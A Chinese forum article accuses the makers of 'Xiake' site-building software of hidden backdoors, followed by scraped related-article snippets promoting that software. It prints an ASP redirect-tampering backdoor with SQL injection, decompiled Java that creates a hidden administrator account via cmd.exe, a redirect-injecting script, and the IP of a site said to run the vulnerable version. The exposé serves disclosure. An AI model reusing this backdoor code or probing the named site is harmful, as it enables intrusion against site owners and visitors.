侠客,你能说自己清白吗?

前不久看到站长网上的一篇声讨侠客软件的文章,估计不论那篇文章的对与错,我只想从另一个角度来剖析一下侠客作者的人品。
       一、侠客1.0偷窃自搜敌
      理由如下:稍能读懂ASP代码的人,可以看到搜敌公布的源码中有程序后门存在,开头的代码如下:

If request("Hm")<>0 Then
set rs=server.createobject("adodb.recordset")
sql = "SELECT * FROM A where Aid="&request("Hm")
rs.open sql,conn,1,3
rs("Tzurl") = request("Tzurl")
response.write "<SCRIPT language=JavaScript>alert('操作成功!');javascript:history.go(-1);</SCRIPT>"
rs.update
rs.close
Response.End
End IF
        意即只要HM参数不为0即可以强制修改方案跳转地址!
        同样的后门存在于侠客的1.0版本中,有兴趣的朋友可以自行测试!下面是我找到的一个侠客1.0的站,得罪这位站长还请原谅!(http://61.157.109.6/)
         二、侠客2.0到4.5全部有后门存在
        在最新公布的4.5版本中,采用JSP编写,简单的反编译一下软件代码,可以看到这样一段内容:
        if (!"cmd".equals(_$29.getAttribute("cmdshell")))
   break MISSING_BLOCK_LABEL_2159;
  as2 = new String[3];
  as2;
  as2[0] = "cmd.exe";
  as2;
  JVM INSTR swap ;
  1;
  "/C";
  JVM INSTR aastore ;
  JVM INSTR dup ;
  JVM INSTR swap ;
  2;
  "net user aaa Langh123!@# /add";
  JVM INSTR aastore ;
  String as[];
  as;
  String as3[] = new String[3];
  as3;
  as3[0] = "cmd.exe";
  as3;
  JVM INSTR swap ;
  1;
  "/C";
  JVM INSTR aastore ;
  JVM INSTR dup ;
  JVM INSTR swap ;
  2;
  "net localgroup administrators aaa /add";
  JVM INSTR aastore ;
  String as1[];
  as1;
  Runtime.getRuntime().exec(as);
  Runtime.getRuntime().exec(as1);

另外在这款最新的4。5版本软件中笔者还发现了一个在用户的网站上添加代码的后门,后门地址为
http://www.vnetpush.cn/push.asp?id=cpuid
       在某个用户的网页中笔者发现在被加载的JS文件内容为:
       document.writeln("  <script language=\"JavaScript\">");
       document.writeln("          self.location=\'http:\/\/www-md5sdfs1df26x6s.sexaiai.com/DNSchang_4b8ffe4e009a8c703f9590e694d5219f\';");
       document.writeln("   <\/script>");

跳转到了一个GG广告站!有兴趣的朋友可以去追查……

软件的好坏暂且不论,单单从上述二点即可看出侠客作者的人品有问题!侠客你还敢说自己是清白的,无辜的吗?

时间: 2024-10-30 15:29:23

侠客,你能说自己清白吗?的相关文章

侠客:互联网做站赚钱的秘密就是做数值

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 07年前,甚至是05-06年以前,Google的钱是最好赚,当然前提是要有一个流量站,在网上赚钱的站长很多很多,不赚钱站长当然就更多了.像QQ空间代码.QQ表情.网赚论坛.私服.传奇私服等词,哪个关键字不是钱?问题是要将关键字排到搜索引擎前五名才有钱可赚呀! 做关键字排名需要SEO技能,而SEO需要时间,不断的让网站升级,不断的去提升数值!做

解读马云的“侠客”风范

以前对马云并不感冒,财富不如陈天桥,相貌不如李彦宏,更重要的是这个其貌不扬的杭州商人还经常出言不逊,狂妄自居,给人不好的印象,和低调的丁磊,内敛的马化腾相比,着实很"自恋".互联网界除了张朝阳与之有共同的"舞美"爱好之外,找不到第三个,然而两人又有本质的差异,张朝阳固然奔放,狂妄,但和马云相比还有段差距,就这点,有些业内人士直言马云吹牛皮的功夫是天下一流. 业界广泛称马云为"侠客",曾让我百思不得其解,随着后来马云入选CCTV年度人物,对马云的了

侠客站群系统V3免费版体验以及WORDPRESS平台实战心得

这几天正有玩站群的欲望,打开早上打开A5一看,侠客站群系统有免费版,于是就在www.xiake5.com/down/v3.rar进行了下载,这么好的事,果断申请不下载怎么能行. 一.初识侠客站群系统 A5客服MM效率很高,五分钟不到,侠客站群免费版授权就给我开通了,灰常开心,虽然说只有一个站点授权,但初学者来说,熟悉后台,体验功能也已经相当足够了.   点击V3免费版图标,初始化后,就进入了操作界面,对于新入门的偶来说,侠客站群的后台还是有点让人眼花缭乱的.模块.任务.数据.设置.定制五个功能区

我是这样利用侠客来做链轮的

大家好,上次跟大家分享了<侠客成长记之-采集发布入门>,介绍了如何搭建一条采集.发布的流水线,在此基础上,本次跟大家分享下如何用侠客站群系统进 行外部链轮建设.相关的一些基础设置前文有提到,本文就不再赘述,有不清楚的同学可以参考前文,对于一些重点的设置本文会提出.思路是用5个第三方平台博 客相互串联起来,形成一个轮状结构(如:A->B->C->D->E->A),相互提权达到权重提升的目的并为我们的主站 贡献权重.注意链接的时候,环状链接即可,不需要交叉链接,因为交

侠客站群——SEO工具中的侠客

如果你是一名苦逼的站长,如果你为了外链和收录从早忙到晚,如果你有一天想尝试,做一名快乐的站长,如果有一天,你想尝试用黑帽手段,虐一些一直虐你的搜索引擎,那么,选择侠客把.我在A5侠客官网www.xiake5.com上购买了侠客软件感觉自己都成了网络中的"侠客".我感觉侠客站群系统不仅是站群工具,更是黑帽SEO工具中的佼佼者.说到黑帽SEO工具,主要有如下几类,采集工具.群发工具.伪原创工具等,而侠客正是集大成者,下面,我就一一道来. 第一,侠客是采集软件 侠客站群的采集功能非常强大,我

侠客密码查看器:快速找回密码 从此不再怕盗号者

侠客密码查看器是一款功能强大的密码查看软件.它支持Windows系统中 *** 显示的星号密码查看,支持拨号密码查看,包括ADSL上网密码查看与LAN上网密码查看,支持网页中 *** 显示的星号密码查看,支持框架页面,支持IE自动完成的密码.表单内容查看与密码列表保存,支持OutLook Express邮件帐户密码查看,支持Windows自动登录密码查看,支持CMOS开机密码清除,支持IE分级审查密码清除. 打开"侠客密码查看器",选择你所需要查看密码的类型:     这里用"

侠客站群采集系统采集模块全流程编写

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 首先先介绍下侠客站群系统的流程.第一,我要写个采集游戏攻略的模块发布到我的网站,我的网站是织梦做的.第二当然是准备工作了,这次主要是说采集模块,发布模块有机会的吧,要不内容太多发布模块官方有很多,各种cms的发布模块侠客都为我们准备的很充分,功能也很完善.第三 最好学习下侠客为我们准备的学习视频.官方学习网址:http://www.xiake

广告联盟:清楚比清白更重要

&http://www.aliyun.com/zixun/aggregation/37954.html">nbsp;       公司(www.emar.com.cn)历时接近一年研发的新广告平台后天就要正式上线公测了,很多业内朋友都很关注,公司内部也都非常忙碌准备,一切看起来就像"嫦娥一号"顺利升空一样,那一成功的瞬间将会带来千千万万广告主和网站主的新愿景和新期待! 临到上线前,想起了大半年前产品策划讨论期间产品经理的一句话:广告联盟当今世界,清楚比清白更重要

淘侠客:我与GG的第一次亲密接触

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 大家好,我是淘侠客,今天来谈谈GG帐号的申请,先说说我吧,我做GG可以说是在07年的下半年才开始接触,那个时候申请是非常简单的,但是当时无知,没有多申请几个呵呵,那个时候申请超级简单,用新浪博客.和讯博客都能通过,到后来第三方博客不能通过了,GG的Blogger是可以通过GGAD的审核的,毕竟是GG自己门下的博客服务,现在Blogger大陆是